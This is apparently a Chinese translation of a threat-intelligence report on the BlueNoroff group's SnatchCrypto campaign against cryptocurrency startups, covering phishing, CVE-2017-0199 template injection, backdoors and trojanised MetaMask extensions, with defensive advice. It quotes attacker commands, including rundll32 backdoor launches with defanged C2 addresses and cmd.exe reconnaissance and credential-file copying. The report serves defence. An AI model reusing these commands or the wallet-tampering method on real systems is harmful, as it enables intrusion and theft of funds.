BlueNoroff又开始对加密货币进行疯狂地窃取

最新的BlueNoroff感染载体

如果说BlueNoroff有什么独特之处，那就是滥用信任。无论是与 SWIFT 基础设施通信以发出欺诈性交易的内部银行服务器，还是安装带有后门的更新以危害其自身用户的加密货币交换软件，或其他方式。在其 SnatchCrypto 活动中，BlueNoroff 滥用了对商业通信的信任，其中包括同事之间的内部聊天，以及与外部对象的联系。

新年伊始，研究人员就看到 BlueNoroff 运营商跟踪和研究成功的加密货币初创公司。渗透团队的目标是建立个人之间的互动地图并了解可能感兴趣的主题。这让他们可以发起高质量的社会工程攻击。

在一个简单的场景中，它可以为准一个共享文档的通知，显示一位同事/朋友通过 Google Drive 给你发来一个文件：

请注意“X”小图标，它是一个无法加载的图像的图标。我们在离线系统上打开了电子邮件；如果系统已连接到互联网，则会有一个从第三方跟踪服务器加载的 Google 文档的真实图标，该图标会立即通知攻击者目标打开了电子邮件。

但我们也发现了一种更复杂的方式，即同事之间互相转发电子邮件。这对攻击者来说效果更好，因为原始电子邮件和附件似乎已经被转发方检查过了。最终，它将信任级别提升到足以打开文档的程度。

我们没有显示转发器地址，因为它属于受攻击的用户，但请注意有一段文字显示为“via sendgrid.net”。 sendgrid.net 上没有相关网站，但它可以是一家名为 Sendgrid 的美国公司拥有的域，该公司专门从事电子邮件传播和电子邮件营销活动。据其网站称，它提供了丰富的用户跟踪功能，并声称每月发送900亿封电子邮件。这似乎是一个合法且信誉良好的业务，这可能就是为什么Gmail只接受简短的“via sendgrid.net”的MIME标头自定义或攻击时的发送者地址伪造。我们将此活动通知了 Sendgrid。当然，许多用户很容易忽略这句话，或者根本不知道它的含义。根据公开信息，这个名字在这里被滥用的人似乎是数字货币组织（dcg.co）的高层管理人员。明确地说，我们认为公司的员工或公司本身与这次攻击或电子邮件无关。

他们还滥用了其他哪些公司的名字?我们整理了一份名单，如下所示：

BlueNoroff挑选这些公司来进行社会工程

如果你邮件中发现它们，可以在沙盒或虚拟离线环境中打开文档，将文档转换为不同的格式或使用非标准查看器（即服务器端文档查看器，即服务器端文档查看器，如GoogleDocs、Collabora Online、ONLYOFFICE、Microsoft Office Online等。

在某些情况下，攻击者似乎对初创攻击非常感兴趣，在钓鱼邮件打开后使用其资源（例如社交媒体帐户、信使和电子邮件）来启动与目标的业务交互。如果风险投资公司给一家初创公司并发送看起来像投资合同或其他一些有重要信息的文件，即使其中包含一些风险，而且微软Office还添加了警告信息，这家初创公司还是会毫不犹豫地打开它们，。

比如，攻击者用 LinkedIn 帐户来接近目标并与他们互动。真实公司的网站与对话中提到的网站不同。通过以这种方式操纵信任，BlueNoroff 甚至可以立即发起攻击。相反，他们可以依赖常规的启用宏的文档或旧的漏洞利用。

我们发现，他们通常坚持使用 CVE-2017-0199，在尝试其他方法之前反复使用它。该漏洞最初允许自动执行链接到武器化文档的远程脚本。该漏洞利用依赖于通过其中一个文档元文件中的嵌入式 URL 获取远程内容。当MS Word显示一个标准的加载弹出窗口时，细心的用户甚至可能会发现一些可疑的事情。

如果文档是离线打开的或远程内容被阻止，则它会显示一些合法内容，这些内容很可能是从另一方抓取或窃取的。

如果文档没有被阻止连接到网络，它会获取一个远程模板，该模板是另一个启用宏的文档。这两份文件就像炸药的两种成分，混合在一起会产生爆炸。第一个包含两个base64编码的二进制对象(一个用于32位和64位Windows)，声明为图像数据。第二个文档（远程模板）包含一个 VBA 宏，它提取其中一个对象，生成一个新进程 (notepad.exe) 来注入和执行二进制代码。尽管二进制对象具有 JPEG 标头，但它们实际上只是带有修改标头的 PE 文件。

有趣的是，BlueNoroff 在这个阶段显示出改进的 opsec。 VBA 宏通过从原始文档中删除二进制对象和对远程模板的引用并将其保存到同一文件中来进行清理。这从本质上消除了文件的武器化，让调查人员在分析进程中摸不着头脑。

此外，我们已经看到该攻击者在初始感染阶段使用了特权提升 (EoP) 技术。根据我们的遥测，通过打开恶意文档创建的 word.exe 进程产生了合法进程 dccw.exe。 dccw.exe 进程是具有自动提升权限的 Windows 系统文件。滥用 dccw.exe 文件是一种已知技术，我们怀疑恶意软件作者使用它来运行具有高权限的下一阶段恶意软件。在另一种情况下，我们观察到 word.exe 生成了一个 notepad.exe，它接收了恶意软件注入，然后又生成了 mmc.exe。不幸的是，由于缺少某些部分，无法获得该技术的全部细节。

恶意软件感染

我们评估 BlueNoroff 组织对加密货币盗窃的兴趣始于至少自 2017 年以来一直在运行的 SnatchCrypto 活动。在跟踪该活动时，我们看到了几个完整的感染链传播恶意软件。对于最初的感染媒介，他们通常使用压缩的 Windows 快捷方式文件或武器化的 Word 文档。请注意，该组在其感染库中有多种方法，并根据情况组合感染链。

第一种感染链：Windows 快捷方式

该组织长期以来一直在利用这种感染载体。攻击者向受害者发送了一个包含快捷方式文件和文档的压缩类型文件。用于初始感染载体的所有压缩文件都具有相似的结构。该压缩文件包含一个文档文件，例如 Word、Excel 或 PDF 文件，该文件受密码保护，以及另一个伪装成包含文档密码的文本文件的文件。该文件实际上是用于获取下一阶段有效负载的 Windows 快捷方式文件。

压缩文件及其内容

在植入Windows可执行类型后门之前，该恶意软件通过多个阶段传递了 Visual Basic Script 和 Powershell Script。

感染链

获取的 VBS 文件负责通过发送基本系统信息、网络适配器信息和进程列表来对受害者进行指纹识别。接下来，Powershell 代理以编码格式传播。它还将受害者的一般信息发送到 C2 服务器和下一个 Powershell 代理，该代理能够执行来自恶意软件操作员的命令。

VBS 和 Powershell 传播链

使用这个 Powershell 代理创建一个功能齐全的后门，使用命令行参数执行：

rundll32.exe %Public%\wmc.dll,#1 4ZK0gYlgqN6ZbKd/NNBWTJOINDc+jJHOFH/9poQ+or9l

该恶意软件检查命令行参数，使用 base64 对其进行解码并使用嵌入式密钥对其进行解密。解密的数据包含：

63429981 63407466 45.238.25[.]2 443

为了验证参数的合法性，恶意软件用0x5837十六进制值异或第二个参数，并将其与第一个参数进行比较。如果两个值匹配，恶意软件会返回解密后的 C2 地址和端口。该恶意软件还加载了一个配置文件（在本例中为 %Public%\Videos\OfficeIntegrator.dat），并使用 RC4 对其进行解密。此配置文件包含 C2 地址，并且将加载下一阶段的有效负载路径。该恶意软件丰富了可以控制受感染设备的后门功能：

目录/文件操作；

进程操作；

注册表操作；

执行命令；

更新配置；

从Chrome、Putty 和 WinSCP 窃取存储的数据；

这些用于部署其他恶意软件工具来监控受害者：键盘记录器和屏幕截图获取器。

第二种感染链：武器化的 Word 文档

我们看到的另一个感染链是从一个恶意的Word文档开始的，这就是攻击者利用远程模板注入 (CVE-2017-0199) 和嵌入式恶意 Visual Basic 脚本的地方。在一个文件（MD5：e26725f34ebcc7fa9976dd07bfbbfba3）中，远程获取的模板引用第一阶段文档并从中读取编码的有效负载，将其注入合法进程。

远程模板感染链

另一个案例嵌入了一个恶意的 Visual Basic 脚本，并在受害者的系统上提取了一个 Powershell 代理。执行此初始感染进程会导致安装 Windows 可执行负载。

感染链

第一个持久性后门是在持久性机制的开始菜单路径中创建的，它生成了第一个带有C2地址的导出函数。

rundll32.exe "%appdata%\microsoft\windows\start menu\programs\maintenance\default.rdp",#1 https://sharedocs[.]xyz/jyrhl4jowfp/eyi8t5sjli/qzrk8blr_q/rnyyuekwun/yzm1ncj8yb/a3q==

执行后，恶意软件会根据主机名、用户名和当前时间戳的组合生成唯一的安装 ID，这些 ID 使用简单的字符串哈希算法进行连接和哈希。在向 C2 服务器发送信标后，恶意软件会收集一般系统信息，并在 AES 加密后发送。从服务器接收到的数据预计具有以下结构：

PROCESS_ID 指示恶意软件将注入新 DLL 的目标进程。 DLL_FILE_SIZE 是要注入的 DLL 文件的大小。最后，DLL_FILE_DATA 包含要注入的实际二进制可执行文件。

根据我们的分析，攻击者使用了另一种类型的后门。第2个持久性后门用于静默运行通过加密通道从远程服务器接收的附加可执行负载。服务器地址不是硬编码的，而是存储在磁盘上的加密文件 (%WINDIR%\AppPatch\PublisherPolicy.tms) 中，其路径在后门中硬编码。解密后的配置文件与第一种感染链中使用的配置文件具有相同的结构。

从上面的案例中我们可以看出，该活动背后的攻击者通过多阶段感染传递了最终的有效载荷，并在检查了受害者的指纹后小心地传递了下一个有效载荷。这使得收集指标来应对攻击变得更加困难。通过严格的感染链，安装了功能齐全的 Windows 可执行类型后门。这个自定义后门长期以来一直被归咎于 BlueNoroff 组织，因此我们坚信 BlueNoroff 组织是这次活动的幕后黑手。

资产盗窃

收集凭据

该威胁行为者在植入全功能后门后通常使用的策略之一是 APT 威胁行为者使用的常见发现和收集策略。我们设法确定了 BlueNoroff 对一名受害者的动手活动，并观察到该组织非常有选择地传播了最终的有效载荷。恶意软件操作员在执行初始分析时主要依赖 Windows 命令。他们收集了用户帐户、IP 地址和会话信息：

· cmd.exe /c “query session >%temp%\TMPBFF2.tmp 2>&1”· cmd.exe /c “ipconfig /all >%temp%\TMPEEE2.tmp 2>&1”· cmd.exe /c “whoami >%temp%\TMP218C.tmp 2>&1”· cmd.exe /c “net user [user account] /domain >%temp%\TMP4B7C.tmp 2>&1”· cmd.exe /c “net localgroup administrators >%temp%\TMP9518.tmp 2>&1”· cmd.exe /c “query session >%temp%\TMPBFF2.tmp 2>&1”· cmd.exe /c “ipconfig /all >%temp%\TMPEEE2.tmp 2>&1”

在收集阶段，恶意软件运营商还依赖 Windows 命令。在找到感兴趣的文件夹后，他们将一个名为策略文件的压缩文件的文件夹复制到之前创建的“MM”文件夹中进行渗透。此外，他们收集了与加密货币软件相关的配置文件，以提取可能的凭据或其他帐户详细信息。

· cmd.exe /c “mkdir %public%\MM >%temp%\TMPF522.tmp 2>&1”· xcopy “%user%\Desktop\[redacted]工作文档\MM策略档案” %public%\MM /S /E /Q /Y· cmd.exe /c “rd /s /q %public%\MM >%temp%\TMP729D.tmp 2>&1”· cmd.exe /c “type D:\2\Crypt[redacted]\Crypt[redacted].conf >%temp%\TMP496B.tmp 2>&1″

我们从一个受害者那里发现，操作人员手动复制了一个由监控工具创建的文件(如截图或按键数据)到%TEMP%文件夹，以便发送到攻击者控制的远程资源。

· cmd.exe /c “copy “%appdata%\Microsoft\Feeds\Creds_5FADD329.dat” %public%\ >%temp%\TMP11C4.tmp 2>&1″

窃取加密货币

在某些情况下，当攻击者认为他们找到了一个有价值的目标时，他们会仔细监控用户数周或数月。他们收集用户的按键信息，监控用户的日常操作，同时制定盗窃策略。

如果攻击者意识到目标使用流行的浏览器扩展来管理加密钱包（例如 Metamask 扩展），他们会将扩展源从 Web Store 更改为本地存储，并将核心扩展组件（backgorund.js）替换为篡改版本。起初，他们对监控交易非常感兴趣。下面的截图显示了两个文件的区别：一个合法的 Metamask background.js 文件及其受感染的变体，其中注入的代码行以黄色突出显示。可以看到，在这种情况下，他们设置了对特定发件人和收件人地址之间交易的监控。我们相信他们拥有庞大的监控基础设施，可以在发现大额转账时触发通知。

交易的详细信息通过 HTTP 自动提交到 C2 服务器：

在另一个案例中，他们意识到用户拥有大量加密货币，但使用的是硬件钱包。使用相同的方法从该用户那里窃取资金，他们拦截了交易进程并注入了自己的逻辑。

这一切听起来很简单，但实际上需要对 Metamask Chrome 扩展进行彻底分析，该扩展包含超过 6MB 的 JavaScript 代码（约 170,000 行代码），并实施代码注入，在使用扩展时按需重写交易细节。

这样，当受攻击的用户将资金转移到另一个账户时，交易将在硬件钱包上签名。然而，考虑到这个动作是由用户在非常合适的时间发起的，用户不会怀疑任何可疑的事情，并在不关注交易细节的情况下在安全设备上确认交易。当用户输入的付费金额很低，并且错误感觉微不足道时，他们并不会太过担心。然而，攻击者不仅修改了接收地址，还将货币数量推到了极限，实际上是一次让用户爆仓。

除非你非常熟悉 Metamask 代码库，否则很难手动找到注入。但是，对 Chrome 扩展的修改会留下痕迹。浏览器必须切换到开发者模式，并且 Metamask 扩展是从本地目录而不是在线商店安装的。如果插件来自商店，Chrome 会对代码强制执行数字签名验证并保证代码完整性。因此，如果你有疑问，请立即检查你的 Metamask 扩展程序和 Chrome 设置。

Google Chrome 中启用了开发者模式

如果你使用开发者模式，请确保你的重要扩展来自网上应用店

除非你自己是 Metamask 开发人员，否则这可能意味着一个被木马化的扩展

SnatchCrypto 的受害者

SnatchCrypto 活动的目标不限于特定的国家和大洲。该活动针对的是根据其工作性质与加密货币和智能合约、DeFi、区块链和金融科技行业打交道的各种公司。

BlueNoroff 受害者

VBA 宏的开发者

对初始感染期间使用的远程模板中的 VBA 宏的分析表明，该代码与位于瑞士沃州 Morges 的 SCRT 公司的攻击性安全研究员 Clément Labro 以前使用的样式和技术相匹配。从 VBA 宏进行进程注入的原始代码尚未公开，因此要么是 Clément 私人开发了它，后来它可供 BlueNoroff 使用，要么有人改编了他的其他 VBA 代码，例如 VBA-RunPE 项目。

PowerShell 脚本重叠

该小组严重依赖的一个工具是 PowerShell 脚本。通过初始感染，他们在多个受害者设备上部署了 PowerShell 代理，发送基本系统信息并从控制服务器执行命令。他们一直在使用这个 PowerShell，同时添加了一些小的更新。

后门重叠

通过复杂的感染链，最终在受害设备上安装了一个 Windows 可执行类型后门。我们只能从少数主机中识别出这种后门恶意软件。它与以前已知的 BlueNoroff 恶意软件有许多代码相似之处。使用 Kaspersky 威胁归因引擎 (KTAE)，我们看到该活动中使用的恶意软件二进制文件与 BlueNoroff 组的已知工具有相当多的代码相似性。

后门代码相似度

此外，我们可以识别通常从 BlueNoroff 组的恶意软件中发现的不常见技术。该组织的恶意软件通过将解析的 IP 地址与硬编码的 DWORD 值进行异或运算来获取真实的 C2 地址。我们在之前的 BlueNoroff 报告中看到了相同的技术。 SnatchCrypto 活动中使用的恶意软件也使用相同的技术来获取真实的 C2 地址。

类似的C2地址获取方案